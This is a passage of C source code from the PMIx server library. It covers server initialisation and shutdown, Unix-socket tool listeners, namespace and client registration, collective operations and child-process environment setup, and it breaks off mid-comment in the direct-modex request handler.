listener = PMIX_NEW(pmix_listener_t);
snprintf(listener->address.sun_path, sizeof(listener->address.sun_path)-1, "%s", pmix_pid);
if (0 > asprintf(&listener->uri, "%s:%lu:%s", pmix_globals.myid.nspace,
(unsigned long)pmix_globals.myid.rank, listener->address.sun_path)) {
free(pmix_pid);
return PMIX_ERR_NOMEM;
}
listener->varname = strdup("PMIX_SERVER_URI");
listener->protocol = PMIX_PROTOCOL_V1;
pmix_list_append(&pmix_server_globals.listeners, &listener->super);
free(pmix_pid);
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server constructed uri %s", listener->uri);
return PMIX_SUCCESS;
}
PMIX_EXPORT pmix_status_t PMIx_server_init(pmix_server_module_t *module,
pmix_info_t info[], size_t ninfo)
{
pmix_usock_posted_recv_t *req;
pmix_status_t rc;
size_t n, m;
pmix_kval_t kv;
pmix_listener_t *lt;
bool need_listener;
int myhostnamelen = 30;
char myhostname[myhostnamelen];
char *pmix_pid, *tdir;
char **protected = NULL;
bool protect;
bool tool_support = false;
bool system_tool = false;
bool session_tool = false;
pmix_listener_t *tl;
if (0 < pmix_globals.init_cntr) {
return PMIX_SUCCESS;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server init called");
/* Check for the info keys that are not independent from
* initialize_server_base() and even may be needed there */
if (NULL != info) {
for (n=0; n < ninfo; n++) {
if (0 == strcmp(info[n].key, PMIX_SERVER_TMPDIR) &&
NULL == mytmpdir) {
mytmpdir = strdup(info[n].value.data.string);
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TMPDIR);
} else if (0 == strcmp(info[n].key, PMIX_SYSTEM_TMPDIR) &&
NULL == systmpdir) {
systmpdir = strdup(info[n].value.data.string);
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SYSTEM_TMPDIR);
}
}
}
if (0 != (rc = initialize_server_base(module))) {
return rc;
}
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (PMIX_SUCCESS != (rc = pmix_dstore_init(info, ninfo))) {
return rc;
}
#endif /* PMIX_ENABLE_DSTORE */
/* and the usock system */
pmix_usock_init(NULL);
/* tell the event library we need thread support */
pmix_event_use_threads();
/* create an event base and progress thread for us */
if (NULL == (pmix_globals.evbase = pmix_progress_thread_init(NULL))) {
return PMIX_ERR_INIT;
}
/* check the info keys for a directive about the uid/gid
* to be set for the rendezvous file */
if (NULL != info) {
for (n=0; n < ninfo; n++) {
if (0 == strcmp(info[n].key, PMIX_USERID)) {
/* the userid is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->owner = info[n].value.data.uint32;
lt->owner_given = true;
}
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_USERID);
} else if (0 == strcmp(info[n].key, PMIX_GRPID)) {
/* the grpid is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->group = info[n].value.data.uint32;
lt->group_given = true;
}
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_GRPID);
} else if (0 == strcmp(info[n].key, PMIX_SOCKET_MODE)) {
/* socket mode is in the uint32_t storage */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
lt->mode = info[n].value.data.uint32;
}
} else if (0 == strcmp(info[n].key, PMIX_SERVER_TOOL_SUPPORT)) {
/* defer processing to ensure we pickup any tmpdir
* directives before setting location */
session_tool = true;
tool_support = true;
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TOOL_SUPPORT);
} else if (0 == strcmp(info[n].key, PMIX_SERVER_SYSTEM_SUPPORT)) {
/* we are also the system tool server */
system_tool = true;
tool_support = true;
/* push this onto our protected list of keys not
* to be passed to the clients */
pmix_argv_append_nosize(&protected, PMIX_SERVER_TOOL_SUPPORT);
}
}
}
if (tool_support) {
/* Get up to 30 chars of hostname.*/
gethostname(myhostname, myhostnamelen);
/* ensure it is NULL terminated */
myhostname[myhostnamelen-1] = '\0';
/* if we are to be the system tool, then we look for
* the system tmpdir and do not include a pid in
* the rendezvous point */
if (system_tool) {
if (NULL != systmpdir) {
tdir = systmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
if (0 > asprintf(&pmix_pid, "%s/pmix.sys.%s", tdir, myhostname)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(tl->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"%s:%d dropping system tool at %s",
pmix_globals.myid.nspace,
pmix_globals.myid.rank, pmix_pid);
/* create the listener for this point */
tl = PMIX_NEW(pmix_listener_t);
tl -> address.sun_family = AF_UNIX;
tl->protocol = PMIX_PROTOCOL_TOOL;
snprintf(tl->address.sun_path, sizeof(tl->address.sun_path) - 1, "%s", pmix_pid);
free(pmix_pid);
pmix_list_append(&pmix_server_globals.listeners, &tl->super);
}
/* if we are a session tool, then we use the session tmpdir
* and append our pid */
if (session_tool) {
if (NULL != mytmpdir) {
tdir = mytmpdir;
} else if (NULL == (tdir = getenv("TMPDIR"))) {
if (NULL == (tdir = getenv("TEMP"))) {
if (NULL == (tdir = getenv("TMP"))) {
tdir = "/tmp";
}
}
}
/* mark this with my pid */
if (0 > asprintf(&pmix_pid, "%s/pmix.%s.tool.%d", tdir, myhostname, mypid)) {
return PMIX_ERR_NOMEM;
}
if ((strlen(pmix_pid) + 1) > sizeof(tl->address.sun_path)-1) {
pmix_show_help("help-pmix-server.txt", "rnd-path-too-long", true, tdir, pmix_pid);
free(pmix_pid);
return PMIX_ERR_INVALID_LENGTH;
}
pmix_output_verbose(2, pmix_globals.debug_output,
"%s:%d dropping session tool at %s",
pmix_globals.myid.nspace,
pmix_globals.myid.rank, pmix_pid);
/* create the listener for this point */
tl = PMIX_NEW(pmix_listener_t);
tl -> address.sun_family = AF_UNIX;
tl->protocol = PMIX_PROTOCOL_TOOL;
snprintf(tl->address.sun_path, sizeof(tl->address.sun_path) - 1, "%s", pmix_pid);
free(pmix_pid);
pmix_list_append(&pmix_server_globals.listeners, &tl->super);
}
/* we don't provide a URI for this listener as we don't pass
* the TOOL connection URI to a child process */
pmix_server_globals.tool_connections_allowed = true;
}
/* setup the wildcard recv for inbound messages from clients */
req = PMIX_NEW(pmix_usock_posted_recv_t);
req->tag = UINT32_MAX;
req->cbfunc = server_message_handler;
/* add it to the end of the list of recvs */
pmix_list_append(&pmix_usock_globals.posted_recvs, &req->super);
/* start listening */
need_listener = false;
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
if (PMIX_SUCCESS != pmix_prepare_listening(lt, &need_listener)) {
PMIx_server_finalize();
return PMIX_ERR_INIT;
}
}
if (need_listener) {
if (PMIX_SUCCESS != pmix_start_listening()) {
pmix_show_help("help-pmix-server.txt", "listener-failed-start", true, tl->address.sun_path);
PMIx_server_finalize();
return PMIX_ERR_INIT;
}
}
/* check the info keys for info we
* need to provide to every client */
if (NULL != info) {
PMIX_CONSTRUCT(&kv, pmix_kval_t);
for (n=0; n < ninfo; n++) {
/* check the list of protected keys */
protect = false;
if (NULL != protected) {
for (m=0; NULL != protected[m]; m++) {
if (0 == strcmp(info[n].key, protected[m])) {
protect = true;
break;
}
}
}
if (protect) {
continue;
}
/* store and pass along to every client */
kv.key = info[n].key;
kv.value = &info[n].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&pmix_server_globals.gdata, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_show_help("help-pmix-server.txt", "data-store-failed", true, kv.key);
/* protect the incoming data */
kv.key = NULL;
kv.value = NULL;
PMIX_DESTRUCT(&kv);
PMIx_server_finalize();
return rc;
}
}
/* protect the incoming data */
kv.key = NULL;
kv.value = NULL;
PMIX_DESTRUCT(&kv);
}
++pmix_globals.init_cntr;
return PMIX_SUCCESS;
}
static void cleanup_server_state(void)
{
int i;
pmix_peer_t *peer;
for (i=0; i < pmix_server_globals.clients.size; i++) {
if (NULL != (peer = (pmix_peer_t*)pmix_pointer_array_get_item(&pmix_server_globals.clients, i))) {
PMIX_RELEASE(peer);
}
}
PMIX_DESTRUCT(&pmix_server_globals.clients);
PMIX_LIST_DESTRUCT(&pmix_server_globals.collectives);
PMIX_LIST_DESTRUCT(&pmix_server_globals.remote_pnd);
PMIX_LIST_DESTRUCT(&pmix_server_globals.local_reqs);
PMIX_DESTRUCT(&pmix_server_globals.gdata);
PMIX_LIST_DESTRUCT(&pmix_server_globals.listeners);
if (NULL != security_mode) {
free(security_mode);
}
if (NULL != mytmpdir) {
free(mytmpdir);
}
if (NULL != systmpdir) {
free(systmpdir);
}
pmix_bfrop_close();
pmix_sec_finalize();
pmix_globals_finalize();
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize complete");
pmix_output_close(pmix_globals.debug_output);
pmix_output_finalize();
pmix_class_finalize();
}
PMIX_EXPORT pmix_status_t PMIx_server_finalize(void)
{
if (1 != pmix_globals.init_cntr) {
--pmix_globals.init_cntr;
return PMIX_SUCCESS;
}
pmix_globals.init_cntr = 0;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize called");
if (pmix_server_globals.listen_thread_active) {
pmix_stop_listening();
}
pmix_progress_thread_finalize(NULL);
#ifdef HAVE_LIBEVENT_GLOBAL_SHUTDOWN
libevent_global_shutdown();
#endif
pmix_usock_finalize();
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
pmix_dstore_finalize();
#endif /* PMIX_ENABLE_DSTORE */
cleanup_server_state();
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server finalize complete");
return PMIX_SUCCESS;
}
static void _register_nspace(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_nspace_t *nptr, *tmp;
pmix_status_t rc;
size_t i, j, size;
int rank;
pmix_kval_t kv;
char **nodes=NULL, **procs=NULL;
pmix_buffer_t buf2;
pmix_info_t *iptr;
pmix_value_t val;
char *msg;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_nspace");
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
/* release any existing packed data - we will replace it */
if (0 < nptr->server->job_info.bytes_used) {
PMIX_DESTRUCT(&nptr->server->job_info);
PMIX_CONSTRUCT(&nptr->server->job_info, pmix_buffer_t);
}
break;
}
}
if (NULL == nptr) {
nptr = PMIX_NEW(pmix_nspace_t);
(void)strncpy(nptr->nspace, cd->proc.nspace, PMIX_MAX_NSLEN);
nptr->server = PMIX_NEW(pmix_server_nspace_t);
pmix_list_append(&pmix_globals.nspaces, &nptr->super);
}
nptr->server->nlocalprocs = cd->nlocalprocs;
/* see if we have everyone */
if (nptr->server->nlocalprocs == pmix_list_get_size(&nptr->server->ranks)) {
nptr->server->all_registered = true;
}
/* pack the name of the nspace */
msg = nptr->nspace;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &msg, 1, PMIX_STRING))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
goto release;
}
/* pack the provided info */
PMIX_CONSTRUCT(&kv, pmix_kval_t);
for (i=0; i < cd->ninfo; i++) {
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_nspace recording %s",
cd->info[i].key);
if (0 == strcmp(cd->info[i].key, PMIX_NODE_MAP)) {
/* parse the regex to get the argv array of node names */
if (PMIX_SUCCESS != (rc = pmix_regex_parse_nodes(cd->info[i].value.data.string, &nodes))) {
PMIX_ERROR_LOG(rc);
continue;
}
/* if we have already found the proc map, then pass
* the detailed map */
if (NULL != procs) {
pmix_pack_proc_map(&nptr->server->job_info, nodes, procs);
pmix_argv_free(nodes);
nodes = NULL;
pmix_argv_free(procs);
procs = NULL;
}
} else if (0 == strcmp(cd->info[i].key, PMIX_PROC_MAP)) {
/* parse the regex to get the argv array containg proc ranks on each node */
if (PMIX_SUCCESS != (rc = pmix_regex_parse_procs(cd->info[i].value.data.string, &procs))) {
PMIX_ERROR_LOG(rc);
continue;
}
/* if we have already recv'd the node map, then record
* the detailed map */
if (NULL != nodes) {
pmix_pack_proc_map(&nptr->server->job_info, nodes, procs);
pmix_argv_free(nodes);
nodes = NULL;
pmix_argv_free(procs);
procs = NULL;
}
} else if (0 == strcmp(cd->info[i].key, PMIX_PROC_DATA)) {
/* an array of data pertaining to a specific proc */
if (PMIX_DATA_ARRAY != cd->info[i].value.type ||
PMIX_INFO != cd->info[i].value.data.darray->type) {
PMIX_ERROR_LOG(PMIX_ERR_BAD_PARAM);
goto release;
}
size = cd->info[i].value.data.darray->size;
iptr = (pmix_info_t*)cd->info[i].value.data.darray->array;
PMIX_CONSTRUCT(&buf2, pmix_buffer_t);
/* first element of the array must be the rank */
if (0 != strcmp(iptr[0].key, PMIX_RANK)) {
PMIX_ERROR_LOG(PMIX_ERR_BAD_PARAM);
PMIX_DESTRUCT(&buf2);
goto release;
}
/* pack it separately */
rank = iptr[0].value.data.rank;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&buf2, &rank, 1, PMIX_PROC_RANK))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
/* cycle thru the values for this rank and pack them */
for (j=1; j < size; j++) {
kv.key = iptr[j].key;
kv.value = &iptr[j].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&buf2, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
}
/* now add the blob */
kv.key = PMIX_PROC_BLOB;
kv.value = &val;
val.type = PMIX_BYTE_OBJECT;
val.data.bo.bytes = buf2.base_ptr;
val.data.bo.size = buf2.bytes_used;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
PMIX_DESTRUCT(&buf2);
goto release;
}
PMIX_DESTRUCT(&buf2);
} else {
/* just a value relating to the entire job */
kv.key = cd->info[i].key;
kv.value = &cd->info[i].value;
if (PMIX_SUCCESS != (rc = pmix_bfrop.pack(&nptr->server->job_info, &kv, 1, PMIX_KVAL))) {
PMIX_ERROR_LOG(rc);
pmix_list_remove_item(&pmix_globals.nspaces, &nptr->super);
PMIX_RELEASE(nptr);
goto release;
}
}
}
/* do not destruct the kv object - no memory leak will result */
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
if (0 > pmix_dstore_nspace_add(cd->proc.nspace)) {
PMIX_ERROR_LOG(rc);
goto release;
}
#endif
release:
if (NULL != nodes) {
pmix_argv_free(nodes);
}
if (NULL != procs) {
pmix_argv_free(procs);
}
if (NULL != cd->opcbfunc) {
cd->opcbfunc(rc, cd->cbdata);
}
PMIX_RELEASE(cd);
}
/* setup the data for a job */
PMIX_EXPORT pmix_status_t PMIx_server_register_nspace(const char nspace[], int nlocalprocs,
pmix_info_t info[], size_t ninfo,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, nspace, PMIX_MAX_NSLEN);
cd->nlocalprocs = nlocalprocs;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* copy across the info array, if given */
if (0 < ninfo) {
cd->ninfo = ninfo;
cd->info = info;
}
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _register_nspace);
return PMIX_SUCCESS;
}
static void _deregister_nspace(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_nspace_t *tmp;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _deregister_nspace %s",
cd->proc.nspace);
/* see if we already have this nspace */
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
pmix_list_remove_item(&pmix_globals.nspaces, &tmp->super);
PMIX_RELEASE(tmp);
break;
}
}
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT void PMIx_server_deregister_nspace(const char nspace[],
pmix_op_cbfunc_t cbfunc,
void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server deregister nspace %s",
nspace);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, nspace, PMIX_MAX_NSLEN);
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _deregister_nspace);
}
void pmix_server_execute_collective(int sd, short args, void *cbdata)
{
pmix_trkr_caddy_t *tcd = (pmix_trkr_caddy_t*)cbdata;
pmix_server_trkr_t *trk = tcd->trk;
char *data = NULL;
size_t sz = 0;
pmix_buffer_t bucket, xfer;
pmix_rank_info_t *info;
pmix_value_t *val;
/* we don't need to check for non-NULL APIs here as
* that was already done when the tracker was created */
if (PMIX_FENCENB_CMD == trk->type) {
/* if the user asked us to collect data, then we have
* to provide any locally collected data to the host
* server so they can circulate it - only take data
* from the specified procs as not everyone is necessarily
* participating! And only take data intended for remote
* distribution as local data will be added when we send
* the result to our local clients */
PMIX_CONSTRUCT(&bucket, pmix_buffer_t);
assert( PMIX_COLLECT_MAX < UCHAR_MAX );
unsigned char tmp = (unsigned char)trk->collect_type;
pmix_bfrop.pack(&bucket, &tmp, 1, PMIX_BYTE);
if (PMIX_COLLECT_YES == trk->collect_type) {
pmix_buffer_t databuf;
PMIX_CONSTRUCT(&databuf, pmix_buffer_t);
pmix_output_verbose(2, pmix_globals.debug_output,
"fence - assembling data");
PMIX_LIST_FOREACH(info, &trk->ranks, pmix_rank_info_t) {
pmix_buffer_t rankbuf;
PMIX_CONSTRUCT(&rankbuf, pmix_buffer_t);
/* get any remote contribution - note that there
* may not be a contribution */
if (PMIX_SUCCESS == pmix_hash_fetch(&info->nptr->server->myremote, info->rank, "modex", &val) &&
NULL != val) {
/* pack the proc so we know the source */
char *foobar = info->nptr->nspace;
pmix_bfrop.pack(&rankbuf, &foobar, 1, PMIX_STRING);
pmix_bfrop.pack(&rankbuf, &info->rank, 1, PMIX_PROC_RANK);
PMIX_CONSTRUCT(&xfer, pmix_buffer_t);
PMIX_LOAD_BUFFER(&xfer, val->data.bo.bytes, val->data.bo.size);
PMIX_VALUE_RELEASE(val);
pmix_buffer_t *pxfer = &xfer;
pmix_bfrop.pack(&rankbuf, &pxfer, 1, PMIX_BUFFER);
PMIX_DESTRUCT(&xfer);
/* now pack this proc's contribution into the bucket */
pmix_buffer_t *pdatabuf = &rankbuf;
pmix_bfrop.pack(&databuf, &pdatabuf, 1, PMIX_BUFFER);
}
PMIX_DESTRUCT(&rankbuf);
}
// TODO: we have multiple data movings while only one is actually need
pmix_buffer_t *pbkt = &databuf;
pmix_bfrop.pack(&bucket, &pbkt, 1, PMIX_BUFFER);
PMIX_DESTRUCT(&databuf);
}
PMIX_UNLOAD_BUFFER(&bucket, data, sz);
PMIX_DESTRUCT(&bucket);
pmix_host_server.fence_nb(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
data, sz, trk->modexcbfunc, trk);
} else if (PMIX_CONNECTNB_CMD == trk->type) {
pmix_host_server.connect(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
trk->op_cbfunc, trk);
} else if (PMIX_DISCONNECTNB_CMD == trk->type) {
pmix_host_server.disconnect(trk->pcs, trk->npcs,
trk->info, trk->ninfo,
trk->op_cbfunc, trk);
} else {
/* unknown type */
PMIX_ERROR_LOG(PMIX_ERR_NOT_FOUND);
pmix_list_remove_item(&pmix_server_globals.collectives, &trk->super);
PMIX_RELEASE(trk);
}
PMIX_RELEASE(tcd);
}
static void _register_client(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info, *iptr, *iptr2;
pmix_nspace_t *nptr, *tmp;
pmix_server_trkr_t *trk;
pmix_trkr_caddy_t *tcd;
bool all_def;
size_t i;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _register_client for nspace %s rank %d",
cd->proc.nspace, cd->proc.rank);
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
break;
}
}
if (NULL == nptr) {
nptr = PMIX_NEW(pmix_nspace_t);
(void)strncpy(nptr->nspace, cd->proc.nspace, PMIX_MAX_NSLEN);
/* add the server object */
nptr->server = PMIX_NEW(pmix_server_nspace_t);
pmix_list_append(&pmix_globals.nspaces, &nptr->super);
}
/* setup a peer object for this client - since the host server
* only deals with the original processes and not any clones,
* we know this function will be called only once per rank */
info = PMIX_NEW(pmix_rank_info_t);
PMIX_RETAIN(nptr);
info->nptr = nptr;
info->rank = cd->proc.rank;
info->uid = cd->uid;
info->gid = cd->gid;
info->server_object = cd->server_object;
pmix_list_append(&nptr->server->ranks, &info->super);
/* see if we have everyone */
if (nptr->server->nlocalprocs == pmix_list_get_size(&nptr->server->ranks)) {
nptr->server->all_registered = true;
/* check any pending trackers to see if they are
* waiting for us. There is a slight race condition whereby
* the host server could have spawned the local client and
* it called back into the collective -before- our local event
* would fire the register_client callback. Deal with that here. */
PMIX_LIST_FOREACH(trk, &pmix_server_globals.collectives, pmix_server_trkr_t) {
/* if this tracker is already complete, then we
* don't need to update it */
if (trk->def_complete) {
continue;
}
/* see if any of our procs are involved - the tracker will
* have been created because a callback was received, but
* no rank info will have been entered since the clients
* had not yet been registered. Thus, we couldn't enter rank
* objects into the tracker as we didn't know which
* of the ranks were local */
for (i=0; i < trk->npcs; i++) {
if (0 != strncmp(cd->proc.nspace, trk->pcs[i].nspace, PMIX_MAX_NSLEN)) {
continue;
}
/* need to check if this rank is one of mine */
PMIX_LIST_FOREACH(iptr, &nptr->server->ranks, pmix_rank_info_t) {
if (PMIX_RANK_WILDCARD == trk->pcs[i].rank ||
iptr->rank == trk->pcs[i].rank) {
/* add a tracker for this proc - don't need more than
* the nspace pointer and rank */
iptr2 = PMIX_NEW(pmix_rank_info_t);
PMIX_RETAIN(info->nptr);
iptr2->nptr = info->nptr;
iptr2->rank = info->rank;
pmix_list_append(&trk->ranks, &iptr2->super);
/* track the count */
++trk->nlocal;
}
}
}
/* we need to know if this tracker is now complete - the only
* way to do this is to check if all participating
* nspaces are fully registered */
all_def = true;
/* search all the involved procs - fortunately, this
* list is usually very small */
PMIX_LIST_FOREACH(iptr, &trk->ranks, pmix_rank_info_t) {
if (!iptr->nptr->server->all_registered) {
/* nope */
all_def = false;
break;
}
}
/* update this tracker's status */
trk->def_complete = all_def;
/* is this now completed? */
if (trk->def_complete && pmix_list_get_size(&trk->local_cbs) == trk->nlocal) {
/* it did, so now we need to process it
* we don't want to block someone
* here, so kick any completed trackers into a
* new event for processing */
PMIX_EXECUTE_COLLECTIVE(tcd, trk, pmix_server_execute_collective);
}
}
/* also check any pending local modex requests to see if
* someone has been waiting for a request on a remote proc
* in one of our nspaces, but we didn't know all the local procs
* and so couldn't determine the proc was remote */
pmix_pending_nspace_requests(nptr);
}
/* let the caller know we are done */
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT pmix_status_t PMIx_server_register_client(const pmix_proc_t *proc,
uid_t uid, gid_t gid, void *server_object,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server register client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->uid = uid;
cd->gid = gid;
cd->server_object = server_object;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _register_client);
return PMIX_SUCCESS;
}
static void _deregister_client(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info;
pmix_nspace_t *nptr, *tmp;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server _deregister_client for nspace %s rank %d",
cd->proc.nspace, cd->proc.rank);
/* see if we already have this nspace */
nptr = NULL;
PMIX_LIST_FOREACH(tmp, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(tmp->nspace, cd->proc.nspace)) {
nptr = tmp;
break;
}
}
if (NULL == nptr) {
/* nothing to do */
goto cleanup;
}
/* find an remove this client */
PMIX_LIST_FOREACH(info, &nptr->server->ranks, pmix_rank_info_t) {
if (info->rank == cd->proc.rank) {
pmix_list_remove_item(&nptr->server->ranks, &info->super);
PMIX_RELEASE(info);
break;
}
}
cleanup:
if (NULL != cd->opcbfunc) {
cd->opcbfunc(PMIX_SUCCESS, cd->cbdata);
}
PMIX_RELEASE(cd);
}
PMIX_EXPORT void PMIx_server_deregister_client(const pmix_proc_t *proc,
pmix_op_cbfunc_t cbfunc, void *cbdata)
{
pmix_setup_caddy_t *cd;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server deregister client %s:%d",
proc->nspace, proc->rank);
cd = PMIX_NEW(pmix_setup_caddy_t);
(void)strncpy(cd->proc.nspace, proc->nspace, PMIX_MAX_NSLEN);
cd->proc.rank = proc->rank;
cd->opcbfunc = cbfunc;
cd->cbdata = cbdata;
/* we have to push this into our event library to avoid
* potential threading issues */
PMIX_THREADSHIFT(cd, _deregister_client);
}
/* setup the envars for a child process */
PMIX_EXPORT pmix_status_t PMIx_server_setup_fork(const pmix_proc_t *proc, char ***env)
{
char rankstr[128];
pmix_listener_t *lt;
pmix_output_verbose(2, pmix_globals.debug_output,
"pmix:server setup_fork for nspace %s rank %d",
proc->nspace, proc->rank);
/* pass the nspace */
pmix_setenv("PMIX_NAMESPACE", proc->nspace, true, env);
/* pass the rank */
(void)snprintf(rankstr, 127, "%d", proc->rank);
pmix_setenv("PMIX_RANK", rankstr, true, env);
/* pass our rendezvous info */
PMIX_LIST_FOREACH(lt, &pmix_server_globals.listeners, pmix_listener_t) {
if (NULL != lt->uri && NULL != lt->varname) {
pmix_setenv(lt->varname, lt->uri, true, env);
}
}
/* pass our active security mode */
pmix_setenv("PMIX_SECURITY_MODE", security_mode, true, env);
#if defined(PMIX_ENABLE_DSTORE) && (PMIX_ENABLE_DSTORE == 1)
/* pass dstore path to files */
pmix_dstore_patch_env(env);
#endif
return PMIX_SUCCESS;
}
/***************************************************************************************************
* Support calls from the host server down to us requesting direct modex data provided by one *
* of our local clients *
***************************************************************************************************/
static void _dmodex_req(int sd, short args, void *cbdata)
{
pmix_setup_caddy_t *cd = (pmix_setup_caddy_t*)cbdata;
pmix_rank_info_t *info, *iptr;
pmix_nspace_t *nptr, *ns;
pmix_buffer_t pbkt;
pmix_value_t *val;
char *data = NULL;
size_t sz = 0;
pmix_dmdx_remote_t *dcd;
pmix_status_t rc;
pmix_output_verbose(2, pmix_globals.debug_output,
"DMODX LOOKING FOR %s:%d",
cd->proc.nspace, cd->proc.rank);
/* this should be one of my clients, but a race condition
* could cause this request to arrive prior to us having
* been informed of it - so first check to see if we know
* about this nspace yet */
nptr = NULL;
PMIX_LIST_FOREACH(ns, &pmix_globals.nspaces, pmix_nspace_t) {
if (0 == strcmp(ns->nspace, cd->proc.nspace)) {
nptr = ns;
break;
}
}
if (NULL == nptr) {
/* we don't know this namespace yet, and so we obviously
* haven't received the data from this proc yet - defer
* the request until we do */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* see if we have this peer in our list */
info = NULL;
PMIX_LIST_FOREACH(iptr, &nptr->server->ranks, pmix_rank_info_t) {
if (iptr->rank == cd->proc.rank) {
info = iptr;
break;
}
}
if (NULL == info) {
/* rank isn't known yet - defer
* the request until we do */
dcd = PMIX_NEW(pmix_dmdx_remote_t);
PMIX_RETAIN(cd);
dcd->cd = cd;
pmix_list_append(&pmix_server_globals.remote_pnd, &dcd->super);
cd->active = false; // ensure the request doesn't hang
return;
}
/* have we received the modex from this proc yet - if
* not, then defer */
if (!info->modex_recvd) {
/* track the request so we can fulfill it once
